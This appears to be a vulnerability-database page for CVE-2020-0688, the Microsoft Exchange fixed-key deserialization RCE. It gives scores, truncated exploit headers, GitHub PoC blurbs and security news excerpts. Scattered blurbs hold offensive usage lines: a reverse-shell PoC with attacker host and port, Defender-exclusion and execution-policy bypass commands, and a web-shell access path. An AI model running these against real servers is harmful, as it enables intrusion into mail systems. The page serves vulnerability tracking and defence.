9
CVSSv2

CVE-2020-0688

Published: 11/02/2020 Updated: 21/07/2021
CVSS v2 Base Score: 9 | Impact Score: 10 | Exploitability Score: 8
CVSS v3 Base Score: 8.8 | Impact Score: 5.9 | Exploitability Score: 2.8
VMScore: 932
Vector: AV:N/AC:L/Au:S/C:C/I:C/A:C

Vulnerability Summary

A remote code execution vulnerability exists in Microsoft Exchange software when the software fails to properly handle objects in memory, aka 'Microsoft Exchange Memory Corruption Vulnerability'.

Most Upvoted Vulmon Research Post

There is no Researcher post for this vulnerability
Would you like to share something about it? Sign up now to share your knowledge with the community.

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

microsoft exchange server 2010

microsoft exchange server 2013

microsoft exchange server 2016

microsoft exchange server 2019

Exploits

# Exploit Title: Microsoft Exchange 2019 15222112 - Authenticated Remote Code Execution # Date: 2020-02-28 # Exploit Author: Photubias # Vendor Advisory: [1] portalmsrcmicrosoftcom/en-US/security-guidance/advisory/CVE-2020-0688 # [2] wwwthezdicom/blog/2020/2/24/cve-2020-0688-remote-code-execution-on-microsof ...
## # This module requires Metasploit: metasploitcom/download # Current source: githubcom/rapid7/metasploit-framework ## require 'bindata' class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking # include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager D ...

Mailing Lists

Microsoft Exchange 2019 version 15222112 suffers from an authenticated remote code execution vulnerability ...
This Metasploit module exploits a NET serialization vulnerability in the Exchange Control Panel (ECP) web page The vulnerability is due to Microsoft Exchange Server not randomizing the keys on a per-installation basis resulting in them using the same validationKey and decryptionKey values With knowledge of these, values an attacker can craft a s ...
This Metasploit module exploits CVE-2020-0787, an arbitrary file move vulnerability in outdated versions of the Background Intelligent Transfer Service (BITS), to overwrite C:\Windows\System32\WindowsCoreDeviceInfodll with a malicious DLL containing the attacker's payload To achieve code execution as the SYSTEM user, the Update Session Orchestrat ...

Github Repositories

Powershell script helping for domain enumeration - Written while doing the 'Advanced Red Team' lab from pentesteracademy

Invoke-Recon Powershell script as a first step for domain enumeration Tries to spot quickwins Just because i'm tired to type the same AD / PowerView commands over and over Prerequisites You may want to exclude your tools directory from Defender (if you clone submodules for examples): Add-MpPreference -ExclusionPath "C:\Users\bleponge\Documents\myrepos" Get-MpP

I made this script for conducting CVE-2020-0688 more rapidly. It helps to improve checking the vuln, reducing hugely steps for that

cve-2020-0688 I made this script for conducting CVE-2020-0688 more rapidly It helps to improve checking the vuln, reducing hugely steps for that Modify these inputs before running the file url = "mailsomethingcom" #input 1* command = "cmd /c echo OOOPS!!! > c:/truongtntxt" #input2* aspsession = "1111a11c-11ad-1c11-1111-1111122f5977&

Exploitation Script for CVE-2020-0688 "Microsoft Exchange default MachineKeySection deserialize vulnerability"

CVE-2020-0688 Exploitation Script for CVE-2020-0688 "Microsoft Exchange default MachineKeySection deserialize vulnerability" Usage: powershell -exec bypass -file \CVE-2020-0688ps1 -xaml <XAML PATH> -uri <default|liveiderror|> Example: This is an example of vulnerability validation by seting header in response powershell -exec bypass

CVE-2020-0688 A remote code execution vulnerability exists in Microsoft Exchange Server when the server fails to properly create unique keys at install time Knowledge of a the validation key allows an authenticated user with a mailbox to pass arbitrary objects to be deserialized by the web application, which runs as SYSTEM About Vulnerability The bug is found in the Exchange

winddows-Active-Directory-Cheatsheet A cheatsheet in order to help during intrusion steps on Windows environment Summary Tools Enumeration Pre auth Find valid users Find valid credentials AS REP Roast Responder Post auth Domain info Powerview Bloodhound Ldeep SPNs Privelege Escalation PowerUp WinPeas FullPower PrintSpoofer Potatoes DNS Admin Abuse Backup Operato

Proxylogon-106370718 Proxylogon 事件: 微軟(Microsoft)上周公布了修補遭到駭客攻擊的 Exchange Server 漏洞,全球恐有數萬個組織受到影響。網域與被入侵的Exchange郵件伺服器有關,而這臺伺服器後來被駭客當作C&C中繼站使用,導致接下來發生加密攻擊事故。   嚴重性: 全球企業普遍使用微

cve-2020-0688 Usage: usage: cve-2020-0688py [-h] -s SERVER -u USER -p PASSWORD -c CMD optional arguments: -h, --help show this help message and exit -s SERVER, --server SERVER ECP Server URL Example: ip/owa -u USER, --user USER login account Example: domain\user -p PASSWORD, --password PASSWORD Passwor

Active Directory Exploitation Cheat Sheet A cheat sheet that contains common enumeration and attack methods for Windows Active Directory This cheat sheet is inspired by the PayloadAllTheThings repo Summary Active Directory Exploitation Cheatsheet Summary Tools Enumeration Using PowerView Using AD Module Using BloodHound Useful Enumeration Tools Local Privilege Escalatio

justtest

cve-2020-0688 Usage: usage: cve-2020-0688py [-h] -s SERVER -u USER -p PASSWORD -c CMD optional arguments: -h, --help show this help message and exit -s SERVER, --server SERVER ECP Server URL Example: ip/owa -u USER, --user USER login account Example: domain\user -p PASSWORD, --password PASSWORD Passwor

Remote Code Execution on Microsoft Exchange Server through fixed cryptographic keys

CVE-2020-0688 A remote code execution vulnerability exists in Microsoft Exchange Server when the server fails to properly create unique keys at install time Knowledge of a the validation key allows an authenticated user with a mailbox to pass arbitrary objects to be deserialized by the web application, which runs as SYSTEM About Vulnerability The bug is found in the Exchange

Scans for Microsoft Exchange Versions with masscan

CVE-2020-0688-Scanner This script scans an IP/range/CIDR and outputs the Microsoft Exchange Servers and Versions discovered The specified IP/range/CIDR will be scanned with masscan on port tcp/443 After a successful scan it tries to HTTP GET "/owa/auth/logonaspx" with curl to grab the Outlook Web Access page source for build versions to display On Small Business S

A tool for generating .NET serialized gadgets that can trigger .NET assembly load/execution when deserialized using BinaryFormatter from JS/VBS/VBA based scripts.

Description A tool for generating NET serialized gadgets that can trigger NET assembly load/execution when deserialized using BinaryFormatter from JS/VBS/VBA scripts The current gadget triggers a call to ActivatorCreateInstance() when deserialized using BinaryFormatter from jscript/vbscript/vba, this means it can be used to trigger execution of your NET assembly of choice

PoC RCE Reverse Shell for CVE-2020-0688

CVE-2020-0688 Working Exploit PoC (CVE-2020-0688) - Reverse Bind Shell Tested using Python27 To Install: pip install -r requirementstxt To Run: python CVE-2020-0688-POCpy 1016124 -lhost 10111 -lport 4444

PoC for Forgot2kEyXCHANGE (CVE-2020-0688) written in PowerShell

PSForgot2kEyXCHANGE PoC for Forgot2kEyXCHANGE (CVE-2020-0688) written in PowerShell Usage This PoC requires a valid Username and Password This PoC uses ysoserialnet to create the new ViewState which contains the command you specified on the -Command param If you don't already have this installed on your system download it here PS> \PSForgot2kEyXCHANGEps1 PS&

Homework-of-C-Sharp C Sharp codes of my blog Shellcodecs Use CreateThread to run shellcode ShellcodeBase64txt Base64 of the shellcode(msfvenom -p windows/x64/exec CMD=calcexe EXITFUNC=thread -f csharp) ReadShellcodecs It will read ShellcodeBase64txt and launch the shellcode DumpLsasscs Source code is githubcom/GhostPack/SafetyKatz Remove some functions of th

CVE-2020-0688 PoC

ecp_slap This proof-of-concept for CVE-2020-0688 includes functions for the scanning and exploitation of a vulnerable on-prem Exchange instance Usage scan - provide credentials and target information to obtain cookies required for exploitation and saves them to 'cookiestxt' Also checks for exposure of the Exchange Control Panel (ECP) service for the targeted Excha

[CVE-2020-0688] Microsoft Exchange Server Fixed Cryptographic Key Remote Code Execution (RCE)

[CVE-2020-0688] Microsoft Exchange Server Fixed Cryptographic Key Remote Code Execution (RCE)

CVE-2020-0688 "Microsoft Exchange default MachineKeySection deserialize vulnerability"

CVE-2020-0688 Exploitation Script for CVE-2020-0688 "Microsoft Exchange default MachineKeySection deserialize vulnerability" Usage: powershell -exec bypass -file \CVE-2020-0688ps1 -xaml <XAML PATH> -uri <default|liveiderror|> Example: This is an example of vulnerability validation by seting header in response powershell -exec bypass

CVE-2020-0688_EXP Auto trigger payload & encrypt method

CVE-2020-0688_EXP CVE-2020-0688_EXP Auto trigger payload python3 CVE-2020-0688_EXPpy -h usage: CVE-2020-0688_EXPpy [-h] -s SERVER -u USER -p PASSWORD -c CMD [-e] optional arguments: -h, --help show this help message and exit -s SERVER, --server ECP Server URL Example: ip/owa -u USER, --user USER login account Example: domain\user -p PA

CVE-2020-0688 - Exchange

python3 CVE-2020-0688py mailchinabaikercom username@domaincom password command

A command line tool to search AttackerKB.

AKB-Explorer A command line tool to search AttackerKB How to install Not much to do, you just have to clone the repo and install the required python libraries git clone githubcom/horshark/akb-explorer/ pip install -r requirementstxt Then you need to add your AKB API key in config/apitxt You can retrive it from your AKB profile echo "YOUR_AKB_API_KEY_HERE&quo

A curated list of awesome C-Sharp frameworks, libraries and software.

awesome-c-sharp A curated list of awesome C-Sharp frameworks, libraries and software CodeHubApp/CodeHub - CodeHub is an iOS application written using Xamarin mxgmn/WaveFunctionCollapse - Bitmap & tilemap generation from a single example with the help of ideas from quantum mechanics dotnet-architecture/eShopOnContainers - Cross-platform NET sample microservices and c

weaponized tool for CVE-2020-0688

weaponized tool for CVE-2020-0688(Microsoft Exchange 2010 MRMAutoTagModel unsafe deserialize vulnerability) build install net framework 35 first, then make usage CVE-2020-17144 <target> <user> <pass> After exploit, access [target]/ews/soap/?pass=whoami to get command execution And you can also modify ecs as a customize e

General Security Scripts

GeneralSecurityScripts --> Please note, unless mentioned otherwise, all scripts work on both Linux and Windows, and for Python2 or 3 (look at the first line) GetNessusHomeCodepy: Automated registration for new Nessus Home Feed license DownloadNessuspy: Automated script for downloading the most recent Nessus version (Linux version only) rdpstrippy: Automated MitM scri

做redteam时使用,修改自Ridter的https://github.com/Ridter/Intranet_Penetration_Tips

Intranet Penetration CheetSheets Modified by: z3r0yu Blog: zeroyuxyz Table of Contents 信息搜集 开源情报信息收集(OSINT) github whois查询/注册人反查/邮箱反查/相关资产 google hacking 创建企业密码字典 字典列表 密码生成 邮箱列表获取 泄露密码查询 对企业外部相关信息进行搜集 子域名获取

2018年初整理的一些内网渗透TIPS,后面更新的慢,所以公开出来希望跟小伙伴们一起更新维护~

Author: Evi1cg Blog: evi1cggithubio Table of Contents 信息搜集 开源情报信息收集(OSINT) github whois查询/注册人反查/邮箱反查/相关资产 google hacking 创建企业密码字典 字典列表 密码生成 邮箱列表获取 泄露密码查询 对企业外部相关信息进行搜集 子域名获取 进入内网 基于企业弱账

做redteam时使用,修改自Ridter的https://github.com/Ridter/Intranet_Penetration_Tips

Intranet Penetration Tips Modified by: z3r0yu Blog: zeroyuxyz PS: 主要增加的内容是自己在做redteam时候的一些技巧 Table of Contents 信息搜集 开源情报信息收集(OSINT) github whois查询/注册人反查/邮箱反查/相关资产 google hacking 创建企业密码字典 字典列表 密码生成 邮箱列表获取 泄露密码查询 对

Active Directory Exploitation Cheat Sheet A cheat sheet that contains common enumeration and attack methods for Windows Active Directory This cheat sheet is inspired by the PayloadAllTheThings repo Summary Active Directory Exploitation Cheatsheet Summary Tools Domain Enumeration Using PowerView Using AD Module Using BloodHound Useful Enumeration Tools Local Privilege Es

A cheat sheet that contains common enumeration and attack methods for Windows Active Directory.

Active Directory Exploitation Cheat Sheet A cheat sheet that contains common enumeration and attack methods for Windows Active Directory This cheat sheet is inspired by the PayloadAllTheThings repo Summary Active Directory Exploitation Cheatsheet Summary Tools Enumeration Using PowerView Using AD Module Using BloodHound Useful Enumeration Tools Local Privilege Escalatio

A cheat sheet that contains common enumeration and attack methods for Windows Active Directory.

Active Directory Exploitation Cheat Sheet A cheat sheet that contains common enumeration and attack methods for Windows Active Directory This cheat sheet is inspired by the PayloadAllTheThings repo Summary Active Directory Exploitation Cheatsheet Summary Tools Enumeration Using PowerView Using AD Module Using BloodHound Useful Enumeration Tools Local Privilege Escalatio

Active Directory Exploitation Cheat Sheet A cheat sheet that contains common enumeration and attack methods for Windows Active Directory This cheat sheet is inspired by the PayloadAllTheThings repo Summary Active Directory Exploitation Cheatsheet Summary Tools Domain Enumeration Using PowerView Using AD Module Using BloodHound Useful Enumeration Tools Local Privilege Es

Summary Active Directory Exploitation Cheatsheet Summary Tools Domain Enumeration Using PowerView Using AD Module Using BloodHound Useful Enumeration Tools Local Privilege Escalation Useful Local Priv Esc Tools Lateral Movement Powershell Remoting Remote Code Execution with PS Credentials Import a powershell module and execute its functions remotely Executing Remote St

Powershell tool to automate Active Directory enumeration.

adPEAS adPEAS is a Powershell tool to automate Active Directory enumeration In fact, adPEAS is like a wrapper for different other cool projects like PowerView Empire Bloodhound and some own written lines of code As said, adPEAS is a wrapper for other tools They are almost all written in pure Powershell but some of them are included as compressed binary blob or C# code How

Scripts to scan for Microsoft Exchange Vulnerabilities In 2021 several dangerous and widely exploited vulnerabilities for Microsoft Exchange servers have been published This repository provides scripts to scan for CVE-2021-26855: The SSRF vulnerability which is the entry point for the ProxyLogon exploit chain CVE-2021-34473: The pre-auth path confusion which is the entry poi

2020年网上阅读过的文章记录

渗透 Seagate Central Storage远程执行代码0天 NSA固件漏洞挖掘 SKF实验室 GraphQL错误,JWT,SSRF,SSTI漏洞环境,可以和githubcom/D0g3-Lab/H1ve漏洞环境结合一起使用 hydra使用 新用法、结合tor代理破解密码 通过滥用文件下载功能中的SQL注入来窃取NTLMv2哈希 通过注入获取NTLMv2 hash值 持久性&nd

Generic assessment template

Pentest Template 1) Setup attacking machine: # NOTE: icmp and udp can't be proxied via proxychains! # setting up, socks, port forwarding for payload delivery ssh -f -N -D <LOCALIP>:<LOCALPORT> root@<REMOTEIP> # from local box socat TCP-LISTEN:<LOCALPORT>,bind=<LOCALIP>,fork,reuseaddr TCP:<RE

Deserialization payload generator for a variety of .NET formatters

A proof-of-concept tool for generating payloads that exploit unsafe NET object deserialization Description ysoserialnet is a collection of utilities and property-oriented programming "gadget chains" discovered in common NET libraries that can, under the right conditions, exploit NET applications performing unsafe deserialization of objects The main driver progra

CS2020 repository MSEL concepts: DMZ # initial access firewall cve (out of scope?) python3 pfsense_auth_226_execpy localhost:65535 nc <IP> # initial access firewall (lockout feature!) web-proxy, ftp, dns, and web-conf proxychains hydra -L ~/userstxt -P ~/passwordstxt <IP> ssh -u -V; # shell to dmz boxes via ssh ssh <USER>@&

Compiled binaries and ready code for Red Teaming

Red Team Binaries Compiled binaries and ready to use code for red teaming *References: githubcom/GhostPack githubcom/rootm0s/WinPwnage githubcom/0xbadjuju/WheresMyImplant githubcom/hfiref0x/UACME githubcom/RhinoSecurityLabs/Aggressor-Scripts pentestmagcom/simpleshellcodeinjector-ssi/ Exploits krbtgtpw/dacl-permis

This is an open source Snort rules repository

SnortRules This is an open source Snort rules repository for exploit and application detection signatures Exploit Rules: CVE-2020-0618 CVE-2020-0688 CVE-2020-1938 CVE-2020-10189 CVE-2020-3952 CVE-2020-5902 CVE-2020-1350 CVE-2020-6287, CVE-2020-6286 (SAP RECON vulnerability)

Detections by Author Author Count DNIF 138 community 127 Total 265 Detections by Directory Directory Count /Advanced Threat Detection/Windows Process Monitoring 119 /Advanced Threat Detection/Proxy Monitoring 29 /Advanced Threat Detection/Webserver Exploits 9 /Cloud Security/Amazon Web Services 13 /Advanced Threat Detection/DNS Monitoring 4 /Cloud

AD-Pentesting-Tools Pentest-Tools General usefull Powershell Scripts AMSI Bypass restriction Bypass Payload Hosting Network Share Scanner Lateral Movement Reverse Shellz POST Exploitation Pivot Backdoor finder Persistence on windows Web Application Pentest Framework Discovery Framework Scanner / Exploitation Web Vulnerability Scanner / Burp Plugins Network- / Service-level Vul

CVEs enumerated by FireEye and that should be addressed to limit the effectiveness of leaked the Red Team tools CVE-2019-11510 – pre-auth arbitrary file reading from Pulse Secure SSL VPNs - CVSS 100 CVE-2020-1472 – Microsoft Active Directory escalation of privileges - CVSS 100 CVE-2018-13379 – pre-auth arbitrary file reading from Fortinet Fortigate SSL VPN

vFeed CVEs Vulnerability Indicators that should be addressed to limit the effectiveness of the Leaked FireEye Red Team tools CVE-2019-11510 – pre-auth arbitrary file reading from Pulse Secure SSL VPNs - CVSS 100 CVE-2020-1472 – Microsoft Active Directory escalation of privileges - CVSS 100 CVE-2018-13379 – pre-auth arbitrary file reading from Fortinet Forti

Pentest-Tools General usefull Powershell Scripts AMSI Bypass restriction Bypass Payload Hosting Network Share Scanner Lateral Movement Reverse Shellz POST Exploitation Pivot Backdoor finder Persistence on windows Web Application Pentest Framework Discovery Framework Scanner / Exploitation Web Vulnerability Scanner / Burp Plugins Network- / Service-level Vulnerability Scanner C

Pentest-Tools General usefull Powershell Scripts AMSI Bypass restriction Bypass Payload Hosting Network Share Scanner Lateral Movement Reverse Shellz POST Exploitation Pivot Backdoor finder Persistence on windows Web Application Pentest Framework Discovery Framework Scanner / Exploitation Web Vulnerability Scanner / Burp Plugins Network- / Service-level Vulnerability Scanner C

Pentest-Tools General usefull Powershell Scripts AMSI Bypass restriction Bypass Payload Hosting Network Share Scanner Lateral Movement Reverse Shellz POST Exploitation Pivot Backdoor finder Persistence on windows Web Application Pentest Framework Discovery Framework Scanner / Exploitation Web Vulnerability Scanner / Burp Plugins Network- / Service-level Vulnerability Scanner C

Useful Pentest tool links

Pentest-Tools Red-Team-Essentialss General usefull Powershell Scripts AMSI Bypass restriction Bypass Payload Hosting Network Share Scanner Lateral Movement Reverse Shellz POST Exploitation Pivot Backdoor finder Persistence on windows Web Application Pentest Framework Discovery Framework Scanner / Exploitation Web Vulnerability Scanner / Burp Plugins Network- / Service-level Vu

Pentest-Tools General usefull Powershell Scripts AMSI Bypass restriction Bypass Payload Hosting Network Share Scanner Lateral Movement Reverse Shellz POST Exploitation Pivot Backdoor finder Persistence on windows Web Application Pentest Framework Discovery Framework Scanner / Exploitation Web Vulnerability Scanner / Burp Plugins Network- / Service-level Vulnerability Scanner C

Pentest-Tools General usefull Powershell Scripts AMSI Bypass restriction Bypass Payload Hosting Network Share Scanner Lateral Movement Reverse Shellz POST Exploitation Pivot Backdoor finder Persistence on windows Web Application Pentest Framework Discovery Framework Scanner / Exploitation Web Vulnerability Scanner / Burp Plugins Network- / Service-level Vulnerability Scanner C

Pentest-Tools General usefull Powershell Scripts AMSI Bypass restriction Bypass Payload Hosting Network Share Scanner Lateral Movement Reverse Shellz POST Exploitation Pivot Backdoor finder Persistence on windows Web Application Pentest Framework Discovery Framework Scanner / Exploitation Web Vulnerability Scanner / Burp Plugins Network- / Service-level Vulnerability Scanner C

红队作战中比较常遇到的一些重点系统漏洞整理。

红队中易被攻击的一些重点系统漏洞整理 一、OA系统 泛微(Weaver-Ecology-OA) 泛微OA E-cology RCE(CNVD-2019-32204) - 影响版本70/80/81/90 泛微OA WorkflowCenterTreeData接口注入(限oracle数据库) 泛微ecology OA数据库配置信息泄露 泛微OA云桥任意文件读取 - 影响2018-2019 多个版本 泛微 e-cology OA 前台SQL注入漏

Middleware-Vulnerability-detection 实时更新较好用最新漏洞EXP,仅供已授权渗透测试使用 2020418项目迎来两位伙伴一起维护 @caizhuang @3ndz Apache --2019 Apache-flink 未授权访问任意 --2019 CVE-2019-0193 Apache-Solr via Velocity template RCE --20203 CVE-2019-17564 Apache-Dubbo反序列化漏洞 --

CVE、CMS、中间件漏洞检测利用合集 Since 2019-9-15

Middleware-Vulnerability-detection 实时更新较好用最新漏洞EXP,仅供已授权渗透测试使用 2020418项目迎来两位伙伴一起维护 @caizhuang @3ndz Apache --2019 Apache-flink 未授权访问任意 --2019 CVE-2019-0193 Apache-Solr via Velocity template RCE --20203 CVE-2019-17564 Apache-Dubbo反序列化漏洞 --2

红方人员作战执行手册

红方人员实战手册 声明 Author : By klion Date : 2020215 寄语 : 愿 2020 后面的每一天都能一切安好 分享初衷 一来, 旨在为 "攻击" / "防御"方 提供更加全面实用的参考 还是那句老闲话 "未知攻焉知防", 所有单纯去说 "攻" 或者 "防" 的都是耍流氓, 攻守兼备

Penetration_Testing_POC 搜集有关渗透测试中用到的POC、脚本、工具、文章等姿势分享,作为笔记吧,欢迎补充。 Penetration_Testing_POC 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone Web APP 提权辅助相关 PC tools-小工具集合 文章/书籍/教程相关 说明 请善用搜索[Ctrl+F]查找 IOT Device&Mobile

Middleware-Vulnerability-detection 2020418项目迎来两位伙伴一起维护 @caizhuang @3ND Apache --2019 Apache-flink 未授权访问任意 --2019 CVE-2019-0193 Apache Solr via Velocity template RCE --20203 CVE-2019-17564 Apache Dubbo反序列化漏洞 --20207 CVE-2020-13925 Apache Kylin 远程命令执行

红方人员实战手册 声明 Author : By klion Date : 2020215 寄语 : 愿 2020 后面的每一天都能一切安好 分享初衷 一来, 旨在为 "攻击" / "防御"方 提供更加全面实用的参考 还是那句老闲话 "未知攻焉知防", 所有单纯去说 "攻" 或者 "防" 的都是耍流氓, 攻守兼备

Penetration_Testing_POC 搜集有关渗透测试中用到的POC、脚本、工具、文章等姿势分享,作为笔记吧,欢迎补充。 Penetration_Testing_POC 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone Web APP 提权辅助相关 PC tools-小工具集合 文章/书籍/教程相关 说明 请善用搜索[Ctrl+F]查找 IOT Device&Mobile

红方人员作战执行手册

红方人员实战手册 声明 Author : By klion Date : 2020215 寄语 : 愿 2020 后面的每一天都能一切安好 分享初衷 一来, 旨在为 "攻击" / "防御"方 提供更加全面实用的参考 还是那句老闲话 "未知攻焉知防", 所有单纯去说 "攻" 或者 "防" 的都是耍流氓, 攻守兼备

公开收集所用

Penetration_Testing_POC 搜集有关渗透测试中用到的POC、脚本、工具、文章等姿势分享,作为笔记吧,欢迎补充。 Penetration_Testing_POC 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone Web APP 提权辅助相关 PC tools-小工具集合 文章/书籍/教程相关 说明 请善用搜索[Ctrl+F]查找 IOT Device&Mobile

Penetration_Testing_POC 搜集有关渗透测试中用到的POC、脚本、工具、文章等姿势分享,作为笔记吧,欢迎补充。 Penetration_Testing_POC 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone Web APP 提权辅助相关 PC tools-小工具集合 文章/书籍/教程相关 说明 请善用搜索[Ctrl+F]查找 IOT Device&Mobile

Penetration_Testing_POC 搜集有关渗透测试中用到的POC、脚本、工具、文章等姿势分享,作为笔记吧,欢迎补充。 Penetration_Testing_POC 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone Web APP 提权辅助相关 PC tools-小工具集合 文章/书籍/教程相关 说明 请善用搜索[Ctrl+F]查找 IOT Device&Mobile

信息收集 主机信息收集 敏感目录文件收集 目录爆破 字典 BurpSuite 搜索引擎语法 Google Hack DuckDuckgo 可搜索微博、人人网等屏蔽了主流搜索引擎的网站 Bing js文件泄漏后台或接口信息 快捷搜索第三方资源 findjs robotstxt 目录可访问( autoindex ) iis短文件名 IIS-ShortName-Scanner

渗透测试有关的POC、EXP、脚本、提权、小工具等,欢迎补充、完善---About penetration-testing python-script poc getshell csrf xss cms php-getshell domainmod-xss penetration-testing-poc csrf-webshell cobub-razor cve rce sql sql-poc poc-exp bypass oa-getshell cve-cms

Penetration_Testing_POC 搜集有关渗透测试中用到的POC、脚本、工具、文章等姿势分享,作为笔记吧,欢迎补充。 Penetration_Testing_POC 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone Web APP 提权辅助相关 PC tools-小工具集合 文章/书籍/教程相关 说明 请善用搜索[Ctrl+F]查找 IOT Device&Mobile

Penetration_Testing_POC 搜集有关渗透测试中用到的POC、脚本、工具、文章等姿势分享,作为笔记吧,欢迎补充。 Penetration_Testing_POC 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone Web APP 提权辅助相关 PC tools-小工具集合 文章/书籍/教程相关 说明 请善用搜索[Ctrl+F]查找 IOT Device&Mobile

PoC in GitHub 2020 CVE-2020-0014 It is possible for a malicious application to construct a TYPE_TOAST window manually and make that window clickable This could lead to a local escalation of privilege with no additional execution privileges needed User action is needed for exploitationProduct: AndroidVersions: Android-80 Android-81 Android-9 Android-10Android ID: A-1286745

PoC in GitHub 2021 CVE-2021-1056 (2021-01-07) NVIDIA GPU Display Driver for Linux, all versions, contains a vulnerability in the kernel mode layer (nvidiako) in which it does not completely honor operating system file system permissions to provide GPU device-level isolation, which may lead to denial of service or information disclosure pokerfaceSad/CVE-2021-1056 CVE-2021-

PoC in GitHub 2021 CVE-2021-1056 (2021-01-07) NVIDIA GPU Display Driver for Linux, all versions, contains a vulnerability in the kernel mode layer (nvidiako) in which it does not completely honor operating system file system permissions to provide GPU device-level isolation, which may lead to denial of service or information disclosure pokerfaceSad/CVE-2021-1056 CVE-2021-

PoC auto collect from GitHub.

PoC in GitHub 2020 CVE-2020-0022 In reassemble_and_dispatch of packet_fragmentercc, there is possible out of bounds write due to an incorrect bounds calculation This could lead to remote code execution over Bluetooth with no additional execution privileges needed User interaction is not needed for exploitationProduct: AndroidVersions: Android-80 Android-81 Android-9 Andr

PoC in GitHub 2020 CVE-2020-0014 (2020-02-13) It is possible for a malicious application to construct a TYPE_TOAST window manually and make that window clickable This could lead to a local escalation of privilege with no additional execution privileges needed User action is needed for exploitationProduct: AndroidVersions: Android-80 Android-81 Android-9 Android-10Android

Here is a collection about Proof of Concepts of Common Vulnerabilities and Exposures, and you may also want to check out current Contents CVE-2011-2856 CVE-2011-3243 CVE-2013-2618 CVE-2013-6632 CVE-2014-1701 CVE-2014-1705 CVE-2014-1747 CVE-2014-3176 CVE-2014-6332 CVE-2014-7927 CVE-2014-7928 CVE-2015-0072 CVE-2015-0235 CVE-2015-0240 CVE-2015-1233 CVE-2015-1242 CVE-2015-1268 CV

Awesome CVE PoC A curated list of CVE PoCs Here is a collection about Proof of Concepts of Common Vulnerabilities and Exposures, and you may also want to check out awesome-web-security Please read the contribution guidelines before contributing This repo is full of PoCs for CVEs If you enjoy this awesome list and would like to support it, check out my Patreon page :

Recent Articles

Top CVEs Trending with Cybercriminals
Threatpost • Becky Bracken • 16 Jul 2021

Criminal small talk in underground forums offer critical clues about which known Common Vulnerabilities and Exposures (CVEs) threat actors are most focused on. This, in turn, offers defenders clues on what to watch out for.
An analysis of such chatter, by Cognyte, examined 15 cybercrime forums between Jan. 2020 and March 2021. In its report, researchers highlight what CVEs are the most frequently mentioned and try to determine where attackers might strike next.
“Our findings reveal...

Widespread Brute-Force Attacks Tied to Russia’s APT28
Threatpost • Lisa Vaas • 02 Jul 2021

U.S. and U.K. authorities are warning that the APT28 advanced-threat actor (APT) – a.k.a. Fancy Bear or Strontium, among other names – has been using a Kubernetes cluster in a widespread campaign of brute-force password-spraying attacks against hundreds of government and private sector targets worldwide.
The joint alert (PDF) – posted on Thursday by the National Security Agency (NSA), the Cybersecurity and Infrastructure Security Agency (CISA), the FBI, and the U.K.’s National Cybe...

Android banking malware sharply increased in the first chunk of 2021, reckons ESET
The Register • Gareth Corfield • 04 Jun 2021

Claims Russia's FSB was poking around an Eastern European ministry

While enterprises stagger under sustained ransomware attacks, Android users are increasingly being targeted by banking malware, with Slovakian infosec firm ESET reckoning it had seen a 159 per cent increase in such malicious software over the last few months.
Even though banking malware aimed at users of the Google mobile OS sharply increased in popularity overall mobile threat detections on the Google-owned operating system declined by 18.8 per cent quarter-on-quarter, said ESET.
...

Microsoft Patch Tuesday – February 2020
Symantec Threat Intelligence Blog • Preethi Koroth • 12 Feb 2021

This month the vendor has patched 99 vulnerabilities, 13 of which are rated Critical.

Posted: 12 Feb, 202024 Min ReadThreat Intelligence SubscribeMicrosoft Patch Tuesday – February 2020This month the vendor has patched 99 vulnerabilities, 13 of which are rated Critical.This month the vendor has patched 99 vulnerabilities, 13 of which are rated Critical.

As always, customers are advised to follow these security best practices:


Install vendor patches as soon as they are available.
Run all so...

Nation-state hackers breached US think tank thrice in a row
BleepingComputer • Ionut Ilascu • 17 Dec 2020

An advanced hacking group believed to be working for the Russian government has compromised the internal network of a think tank in the U.S. three times.
Incident responders from cybersecurity company Volexity investigating the attacks between late 2019 and July 2020 named the threat actor Dark Halo, a versatile adversary capable to quickly switch to different tactics and techniques to carry out long-term, stealthy operations.
In one attack, Dark Halo leveraged a newly disclosed vuln...

US think tank breached three times in a row by SolarWinds hackers
BleepingComputer • Ionut Ilascu • 17 Dec 2020

An advanced hacking group believed to be working for the Russian government has compromised the internal network of a think tank in the U.S. three times.
Incident responders from cybersecurity company Volexity investigating the attacks between late 2019 and July 2020 named the threat actor Dark Halo, a versatile adversary capable to quickly switch to different tactics and techniques to carry out long-term, stealthy operations.
In one attack, Dark Halo leveraged a newly disclosed vuln...

Bug Parade: NSA Warns on Cresting China-Backed Cyberattacks
Threatpost • Tara Seals • 21 Oct 2020

Chinese state-sponsored cyberattackers are actively compromising U.S. targets using a raft of known security vulnerabilities – with a Pulse VPN flaw claiming the dubious title of “most-favored bug” for these groups.
That’s according to the National Security Agency (NSA), which released a “top 25” list of the exploits that are used the most by China-linked advanced persistent threats (APT), which include the likes of Cactus Pete, TA413, Vicious Panda and Winniti.
The Feds...

Microsoft Exchange Servers Still Open to Actively Exploited Flaw
Threatpost • Lindsey O'Donnell • 30 Sep 2020

Over half of exposed Exchange servers are still vulnerable to a severe bug that allows authenticated attackers to execute code remotely with system privileges – even eight months after Microsoft issued a fix.
The vulnerability in question (CVE-2020-0688) exists in the control panel of Exchange, Microsoft’s mail server and calendaring server. The flaw, which stems from the server failing to properly create unique keys at install time, was fixed as part of Microsoft’s February Patc...

Over 247K Exchange servers unpatched for actively exploited flaw
BleepingComputer • Sergiu Gatlan • 29 Sep 2020

More than 247,000 Microsoft Exchange servers are yet to be patched against the CVE-2020-0688 post-auth remote code execution (RCE) vulnerability impacting all Exchange Server versions under support.
The CVE-2020-0688 RCE flaw exists in the Exchange Control Panel (ECP) component — enabled in default configurations — and it enables potential attackers to remotely take over vulnerable Exchange servers using any valid email credentials.
Microsoft addressed the security issue as part ...

Feds Warn Nation-State Hackers are Actively Exploiting Unpatched Microsoft Exchange, F5, VPN Bugs
Threatpost • Lindsey O'Donnell • 14 Sep 2020

